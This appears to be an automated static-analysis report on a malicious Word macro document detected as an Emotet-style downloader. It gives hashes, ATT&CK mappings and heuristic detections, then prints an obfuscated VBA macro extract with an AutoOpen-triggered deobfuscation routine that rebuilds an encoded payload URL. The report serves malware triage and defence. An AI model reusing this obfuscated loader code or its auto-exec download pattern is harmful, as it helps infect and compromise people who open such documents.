Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31e66b375181f852…

MALICIOUS

Office (OLE)

Size: 159.5 KB
Created: 2018-03-27 18:31:00
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: adb6ad8b4f4f2a9ea1381cea14652bc0
SHA-1: a61b0252e721348e028bd3da29cc296c02b1616a
SHA-256: 31e66b375181f85237faf94f5cc641eed5ff94bef9fe376b8db431828839b945
Risk score: 244

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, including an AutoOpen macro that uses CreateObject to execute code. The FFviw function appears to be a deobfuscation routine that reconstructs a URL. The reconstructed URL is "6@a.5ADIAZAAyAGUAOQAyAGIAYgBjAGEAOAA0AGIAMQA4ADIAYgA0ADkAMwBlAGIAOAAwADcAMgA5ADYANQBlADMAMAAwADYANwBhAGMAZQA5AGQAMgBiADYANQA4AGUAMAA0AGUAMwA3AGYAMwA1ADQAOQBmAGIAY", which is likely a second-stage payload download URL. This indicates a typical macro-based malware delivery mechanism.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected (medium; OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (high; OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present (medium; OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 49786 bytes
SHA-256: 8f7bc7eb451fa8502e5a89ea9da5baa0cb4f355b24ff869a5f1ca73836d64648
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 17 long base64-like blobs)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kXilSNkMQvz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wwCusBGiizsZIQ"
Function FawfvMfsoi()
On Error Resume Next
Select Case cArjf
      Case 26957
         NIDAG = CStr(hPASAo + CStr(13578) - jEhWpp * 35369)
      Case 54261
         LdLQs = LoTWi
         bWLEO = Tan(14355 * LPiSO)
End Select
vsBfMCj = FFviw("73t8.AwADgAZgBiADQANAA4AGMAOAA3AGIANgA0AGYAOAAzADAANABlADkAZABhAGQAOABiADYAMgA5AGIAMAAzADUAZQA0ADUAOQA5AGUANgAxADUAMAA4AGEAOABmAGEAOABmAGIAMAAwADYAOAA4ADUAMQA3ADkAMwAxADQAYwBkAGEAYwBkAGQAZQA1AGMkX@", 6, 189)
Select Case vwKNq
      Case 46563
         lzrXud = CStr(NoihRY + CStr(51588) - hVRai * 90687)
      Case 31976
         dKwrwG = bdwwV
         ioJkSK = Tan(43536 * BApwqP)
End Select
Select Case EFmEw
      Case 82515
         hKbict = CStr(tiDrn + CStr(65147) - ZbdYTF * 79947)
      Case 76664
         KGVpo = aErjl
         QUIaw = Tan(86052 * lXfDdY)
End Select
WuilNpIE = FFviw("viIANQAzADcAMgBkADAAZAA1AGUANwA1ADQAMp9GE", 4, 34)
Select Case iIfclz
      Case 87843
         QYHDM = CStr(DzzDwa + CStr(17928) - UzVMz * 5464)
      Case 70888
         DrRIdR = PzmiN
         kTujF = Tan(63629 * jzhwV)
End Select
Select Case AlVbS
      Case 6525
         aQCKlQ = CStr(lamdj + CStr(52499) - rdzzo * 23177)
      Case 87406
         KVLzuZ = hcNpOu
         lGUDES = Tan(64352 * zBzoJH)
End Select
zzlWjXDm = FFviw("6@a.5ADIAZAAyAGUAOQAyAGIAYgBjAGEAOAA0AGIAMQA4ADIAYgA0ADkAMwBlAGIAOAAwADcAMgA5ADYANQBlADMAMAAwADYANwBhAGMAZQA5AGQAMgBiADYANQA4AGUAMAA0AGUAMwA3AGYAMwA1ADQAOQBmAGIAYQBjAGIANREP", 5, 166)
Select Case ddrBo
      Case 11667
         wmVmBt = CStr(QqMYD + CStr(85716) - dlHbFL * 46926)
      Case 20738
         GQbJw = wNFhEI
         hRQnpj = Tan(20162 * PFOhAr)
End Select
Select Case kuTOrq
      Case 66372
         tamdsD = CStr(XEPfh + CStr(54383) - kitRMn * 51286)
      Case 1333
         ikFDz = DjaEpf
         afTkIo = Tan(84227 * MjWqK)
End Select
HJrzNd = FFviw("wCIANABkADTXKsnW", 3, 8)
Select Case UZiuDs
      Case 47694
         tnAXb = CStr(iEcmO + CStr(1688) - Ozbfm * 17105)
      Case 66930
         DiMnG = GvKlmL
         mjjkM = Tan(81967 * HEkcJl)
End Select
Select Case fowuiu
      Case 79414
         LPjLP = CStr(Tjacld + CStr(42217) - Xrvqi * 22331)
      Case 68461
         CbwMz = NaJXC
         fqUtk = Tan(81984 * jwEnrW)
End Select
YujrofsT = FFviw("v6uh3NADcANQA3ADQAZABkAGMANQA3ADEANGb", 7, 29)
Select Case QFwrLd
      Case 61198
         NIMDBv = CStr(ATOaS + CStr(49844) - WCGshD * 35130)
      Case 96696
         HpXGIb = MYXid
         hjpiK = Tan(93948 * ZQEAki)
End Select
Select Case SsGqGt
      Case 94227
         rdbNqC = CStr(UbfLu + CStr(25495) - PqEZMf * 24245)
      Case 26636
         KWqEjF = qpMVNj
         ucjpB = Tan(64060 * nscjcQ)
End Select
pVIJXYdGLlI = FFviw("m4t%MAAzAGYANQA1ADIANAAxADMAYQAyAGUANABiAGUANwA4ADUANABmAGEAMQBhADIAMQA4AGEAYQ9W", 5, 74)
Select Case hhRSin
      Case 32945
         zzUOBp = CStr(irZfp + CStr(19167) - cqKjvX * 56995)
      Case 26858
         GpnII = CjvjDd
         UnfDRJ = Tan(70521 * wackE)
End Select
Select Case VBzhzz
      Case 91049
         GoMJpD = CStr(wiEDF + CStr(28609) - uwAOj * 6341)
      Case 9842
         kscMim = aIGNNC
         JkOcO = Tan(38335 * YKCUHG)
End Select
tUcKLh = FFviw(".kPwMkADAANQBiADcANwBkAGQHRz", 6, 20)
Select Case jlRsk
      Case 32663
         UhcZO = CStr(IwzrB + CStr(22684) - pQADo * 71507)
      Case 93197
         hZsWf = tXoVcl
         pDlCA = Tan(32894 * cNLSvh)
End Select
Select Case DvJkwS
      Case 24898
         WMofP = CStr(fFZXZ + CStr(31353) - CwHPk * 996)
      Case 82495
         jhmSX = zLoOlJ
         sSUdD = Tan(42144 * XKDKVR)
End Select
CmUzjf = FFviw("S4AGQAZgAzADkANABjADkAYwA5ADAAZQAjRMMMF", 2, 32)
Select Case zCUL
... (truncated)